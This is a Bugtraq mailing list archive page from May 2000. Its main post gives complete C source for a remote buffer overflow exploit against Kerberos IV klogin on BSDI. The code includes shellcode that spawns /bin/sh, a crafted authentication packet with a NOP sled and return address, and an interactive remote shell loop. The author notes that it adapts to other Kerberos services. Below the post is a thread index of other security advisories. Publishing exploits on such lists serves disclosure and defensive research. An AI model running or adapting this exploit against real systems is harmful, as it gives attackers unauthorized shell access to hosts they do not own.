Bugtraq mailing list archives
klogin remote exploit
From: duke () ZOLO FREELSD NET (duke)
Date: Thu, 18 May 2000 03:27:23 +0400
hi, this exploits the overflow discussed in kerberos earlier.. /* klogin remote buffer overflow by duke (duke () viper net au) tested on BSDI 4.0.1 klogin. The bug is actually in the kerberos library so this affects all kerb services (kerbIV). This code should need minimal (if any) modification to use on other kerberos services. it will only work if the file /etc/kerberosIV/krb.conf exists. -duke */ #include <stdio.h> #include <string.h> #include <netdb.h> #include <unistd.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/time.h> #include <sys/select.h> #include <netinet/in.h> #define RET 0x8047830 #define NOPLEN 900 #define MAX(x, y) ((x > y) ? x : y) char bsdi_shell[]= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76" "\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07" "\xff\xe8\xdc\xff\xff\xff/bin/sh\x00"; void usage(char *); void shell(int); char *make_data(void); int offset=0; int main(int argc, char **argv) { int sockfd, port=543, c; char *pkt, buf[1024]; struct sockaddr_in sin; struct hostent *hp; while((c = getopt(argc, argv, "p:o:")) != EOF){ switch(c){ case 'p': port = atoi(optarg); break; case 'o': offset = atoi(optarg); break; default: usage(argv[0]); } } if(!argv[optind]) usage(argv[0]); if((hp = gethostbyname(argv[optind])) == NULL){ fprintf(stderr, "can't resolve host\n"); exit(-1); } pkt = make_data(); bzero(&sin, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_port = htons(port); sin.sin_addr = *((struct in_addr *)hp->h_addr_list[0]); if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(-1); } if(connect(sockfd, (struct sockaddr *)&sin, sizeof(sin)) < 0){ perror("connect"); exit(-1); } write(sockfd, pkt, 1221); free(pkt); shell(sockfd); } void usage(char *p) { fprintf(stderr, "usage: %s [ -p port ] [ -o offset ] <hostname>\n", p); fprintf(stderr, "-p: port to use\n"); fprintf(stderr, "-o: offset\n"); exit(0); } char *make_data(void) { char *tmp, *ptr; int i; if((tmp=(char *)calloc(1250, sizeof(char))) == NULL){ perror("calloc"); exit(-1); } ptr = tmp; *ptr++ = 0x00; memcpy(ptr, "AUTHV0.1", 8); ptr+=8; for(i=0; i<8; i++) *ptr++ = 0x41; *(unsigned long *)ptr = htonl(1200); ptr+=4; *(unsigned int *)ptr++ = 4; *ptr++ = 8; *ptr++ = 1; for(i=0; i < 600; i+=4) *(long *)&ptr[i] = RET + offset; memset(ptr+300, 0x90, NOPLEN); memcpy(ptr+800, bsdi_shell, sizeof(bsdi_shell)); *(ptr+1000) = 0x00; return(tmp); } void shell(int sock) { fd_set rset; char bu[1024]; write(sock, "cd /; id; pwd; uname -a;\n", 25); FD_ZERO(&rset); for(;;){ FD_SET(fileno(stdin), &rset); FD_SET(sock, &rset); if(select(MAX(sock, fileno(stdin))+1, &rset, NULL, NULL, NULL) < 0){ perror("select"); exit(-1); } if(FD_ISSET(sock, &rset)){ char buf[1024]; int n; bzero(buf, sizeof(buf)); n = read(sock, buf, sizeof(buf)-1); if(n == 0){ printf("EOF from server\n"); exit(0); } if(n < 0){ perror("read"); exit(-1); } else { write(1, buf, n); } } if(FD_ISSET(fileno(stdin), &rset)){ char buf[1024]; bzero(buf, sizeof(buf)); if(fgets(buf, sizeof(buf)-4, stdin) == NULL){ printf("OK. Quitting\n"); close(sock); exit(0); } strcat(buf, "\n"); if(write(sock, buf, strlen(buf)) < 0){ perror("write"); exit(0); } } } }
Current thread:
- Re: Advisory: Netopia R9100 router vulnerability, (continued)
- Re: Advisory: Netopia R9100 router vulnerability Jeffrey Paul (May 13)
- "ClientSideTrojan" bug Kragen Sitaker (May 09)
- Re: "ClientSideTrojan" bug David L. Nicol (May 11)
- Re: "ClientSideTrojan" bug Magosanyi Arpad (May 16)
- BUFFER OVERRUN VULNERABILITIES IN KERBEROS Jeffrey I. Schiller (May 16)
- Re: BUFFER OVERRUN VULNERABILITIES IN KERBEROS Kris Kennaway (May 18)
- antisniff x86/linux remote root exploit, including "fixed" 1.02 version Sebastian (May 16)
- announce : Nessus 1.0 released Renaud Deraison (May 17)
- RFP2K04: Mining BlackICE with RFPickAxe rain forest puppy (May 17)
- FreeBSD Security Advisory: FreeBSD-SA-00:08.lynx [REVISED] FreeBSD Security Officer (May 17)
- klogin remote exploit duke (May 17)
- Re: RFP2K04: Mining BlackICE with RFPickAxe Robert Graham (May 17)
- antisniff latest ("two times fixed") version still exploitable, l0phtl0phe-kid.c Sebastian (May 18)
- Re: antisniff latest ("two times fixed") version still exploitable, l0phtl0phe-kid.c Mudge (May 18)
- Re: RFP2K04: Mining BlackICE with RFPickAxe Matt (May 18)
- AUX Security Advisory on Be/OS 5.0 (DoS) visi0n (May 17)
- Re: RFP2K04: Mining BlackICE with RFPickAxe Andrew Lambeth (May 19)
- Remote Dos attack against Intel express 8100 router Dimuthu Parussalla (May 18)
- RFP2K05: NetProwler vs. RFProwler rain forest puppy (May 19)
- Key Generation Security Flaw in PGP 5.0 gec () ACM ORG (May 23)
- Filesystem vulnerability in AIX salme () US IBM COM (May 23)